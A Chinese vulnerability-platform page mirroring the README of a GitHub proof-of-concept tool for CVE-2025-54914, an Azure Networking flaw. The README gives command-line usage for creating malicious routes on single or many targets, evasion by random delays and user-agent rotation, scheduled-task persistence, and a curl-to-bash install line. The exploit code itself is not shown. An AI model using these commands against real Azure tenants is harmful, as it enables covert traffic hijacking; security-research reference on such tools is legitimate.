漏洞平台

POC详情： a88f017238b668e16102607315f7971bd8dc3f35

来源

https://github.com/Ash1996x/CVE-2025-54914-PoC

关联漏洞

标题： Microsoft Azure Networking 访问控制错误漏洞 (CVE-2025-54914)
描述：Microsoft Azure Networking是美国Microsoft公司的一个网络相关的服务功能集合。 Microsoft Azure Networking存在访问控制错误漏洞，该漏洞源于可能导致权限提升。

介绍

# CVE-2025-54914 Azure Route Exploit

## Overview

This is an improved implementation of the CVE-2025-54914 Azure Networking Route exploit. This version maintains the core CVE functionality while adding more features including persistence, evasion, multi-target scanning, and error handling.

## Features

### Core CVE Functionality
- **Route Creation**: Creates malicious routes in Azure virtual networks
- **Route Deletion**: Removes created routes for cleanup
- **API Compatibility**: Works with Azure Management API 2025-09-01
- **Authentication**: Supports Azure CLI and manual token authentication

### Enhanced Features
- **Evasion Techniques**: Random delays, user agent rotation, request obfuscation
- **Persistence**: Scheduled task creation, continuous monitoring mode
- **Multi-Target Scanning**: Concurrent scanning and exploitation of multiple targets
- **Comprehensive Reporting**: Detailed reports with success/failure analysis
- **Error Handling**: Graceful failure handling and recovery
- **Configuration Management**: JSON-based target configuration
- **Target Discovery**: Automatic discovery of vulnerable resources
- **Risk Assessment**: Vulnerability analysis and risk scoring

## Installation

### Prerequisites
```bash
# Install Python dependencies
pip install requests

# Install Azure CLI (for authentication)
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
```

### Setup
```bash
# Make scripts executable
chmod +x exploit.py
chmod +x exploit_utils.py

# Authenticate with Azure
az login
```

## Usage

### Basic Usage

#### Single Target Exploitation
```bash
# Create route on single target
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

# Delete route
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --route-name "exploit-route-1" \
    --operation delete
```

#### Multi-Target Exploitation
```bash
# Create configuration file
python exploit_utils.py discover --output targets.json

# Exploit all targets
python exploit.py --targets-file targets.json --operation create
```

#### Scan Mode
```bash
# Scan targets without exploitation
python exploit.py --targets-file targets.json --scan-only
```

#### Persistence Mode
```bash
# Enable persistence with 30-minute intervals
python exploit.py --targets-file targets.json --persistence-mode --interval 30
```

### Advanced Usage

#### Evasion and Stealth
```bash
# Custom delay ranges for evasion
python exploit.py \
    --targets-file targets.json \
    --delay-min 1.0 \
    --delay-max 5.0 \
    --max-workers 5
```

#### Dry Run Mode
```bash
# Test without actual exploitation
python exploit.py --targets-file targets.json --dry-run
```

#### Detailed Logging
```bash
# Enable debug logging
python exploit.py \
    --targets-file targets.json \
    --log-level DEBUG \
    --log-file exploit.log
```

## Configuration

### Target Configuration Format
```json
{
  "targets": [
    {
      "subscription_id": "12345678-1234-1234-1234-123456789012",
      "resource_group": "production-rg",
      "vnet_name": "prod-vnet",
      "subnet_name": "prod-subnet",
      "route_name": "exploit-route-1",
      "address_prefix": "10.0.1.0/24",
      "next_hop_type": "VirtualAppliance",
      "next_hop_ip": "10.0.2.5",
      "api_version": "2025-09-01",
      "priority": 1
    }
  ],
  "metadata": {
    "description": "Target configuration for CVE-2025-54914",
    "created": "2025-01-09",
    "version": "1.0"
  }
}
```

### Environment Variables
```bash
# Azure access token (alternative to Azure CLI)
export AZURE_ACCESS_TOKEN="your_token_here"

# Log level
export LOG_LEVEL="INFO"
```

## Utility Scripts

### Target Discovery
```bash
# Discover all accessible targets
python exploit_utils.py discover --output discovered_targets.json

# Discover specific subscriptions
python exploit_utils.py discover \
    --subscription-ids "sub1" "sub2" \
    --output targets.json \
    --report discovery_report.txt
```

### Configuration Generation
```bash
# Generate exploit configuration from discovered targets
python exploit_utils.py config \
    --input discovered_targets.json \
    --output exploit_config.json \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"
```

### Vulnerability Analysis
```bash
# Analyze targets for risk assessment
python exploit_utils.py analyze \
    --input targets.json \
    --output vulnerability_report.txt
```

## Security Features

### Evasion Techniques
- **Request Timing**: Random delays between requests
- **User Agent Rotation**: Multiple browser user agents
- **Header Obfuscation**: Realistic HTTP headers
- **SSL Verification**: Proper certificate validation

### Persistence Mechanisms
- **Scheduled Tasks**: Windows scheduled task creation
- **Continuous Mode**: Long-running persistence
- **Session Management**: State preservation across runs
- **Configuration Persistence**: Settings saved to disk

### Error Handling
- **Graceful Degradation**: Continues on individual failures
- **Timeout Protection**: Prevents hanging requests
- **Signal Handling**: Clean shutdown on interruption
- **Resource Cleanup**: Automatic cleanup on exit

## Reporting

### Exploit Reports
- **Operation Results**: Success/failure for each target
- **Timing Information**: Execution timestamps
- **Error Details**: Detailed error messages
- **Summary Statistics**: Overall success rates

### Discovery Reports
- **Target Inventory**: Complete list of discovered resources
- **Subscription Breakdown**: Targets grouped by subscription
- **Resource Details**: VNet, subnet, and location information

### Vulnerability Analysis
- **Risk Assessment**: High/medium/low risk categorization
- **Production Indicators**: Identification of production environments
- **Tag Analysis**: Risk scoring based on resource tags

## Best Practices

### Operational Security
1. **Use Dry Run**: Always test with `--dry-run` first
2. **Limit Scope**: Start with non-production environments
3. **Monitor Logs**: Review logs for unexpected behavior
4. **Clean Up**: Remove created routes after testing

### Performance Optimization
1. **Worker Limits**: Adjust `--max-workers` based on system capacity
2. **Delay Tuning**: Balance stealth vs. speed with delay settings
3. **Batch Processing**: Use target files for large-scale operations
4. **Resource Monitoring**: Monitor system resources during execution

### Error Recovery
1. **Check Logs**: Review error messages for troubleshooting
2. **Verify Permissions**: Ensure proper Azure permissions
3. **Network Connectivity**: Verify internet connectivity
4. **Token Validity**: Check Azure CLI authentication status

## Troubleshooting

### Common Issues

#### Authentication Errors
```bash
# Re-authenticate with Azure
az login

# Check current account
az account show

# List accessible subscriptions
az account list
```

#### Permission Errors
```bash
# Check required permissions
az role assignment list --assignee $(az account show --query user.name -o tsv)
```

#### Network Errors
```bash
# Test connectivity
curl -I https://management.azure.com

# Check proxy settings
echo $HTTP_PROXY
echo $HTTPS_PROXY
```

### Debug Mode
```bash
# Enable detailed logging
python exploit.py --log-level DEBUG --log-file debug.log

# Check log file
tail -f debug.log
```

## Legal and Ethical Considerations

⚠️ **IMPORTANT**: This tool is for authorized security testing only.

- **Authorization Required**: Only use on systems you own or have explicit permission to test
- **Legal Compliance**: Ensure compliance with local laws and regulations
- **Responsible Disclosure**: Report vulnerabilities through proper channels
- **Educational Use**: This tool is intended for educational and research purposes

## License

This project is licensed for research and educational use only. Commercial use requires explicit permission.

## Contributing

1. Fork the repository
2. Create a feature branch
3. Make your changes
4. Add tests if applicable
5. Submit a pull request

## Support

For issues and questions:
1. Check the troubleshooting section
2. Review the logs for error details
3. Create an issue with detailed information
4. Include relevant configuration and error messages

文件快照


 [4.0K]  /data/pocs/a88f017238b668e16102607315f7971bd8dc3f35
├── [ 28K]  exploit.py
├── [ 17K]  exploit_utils.py
├── [1.0K]  LICENSE
├── [8.3K]  README.md
└── [1.3K]  targets_sample.json

0 directories, 5 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。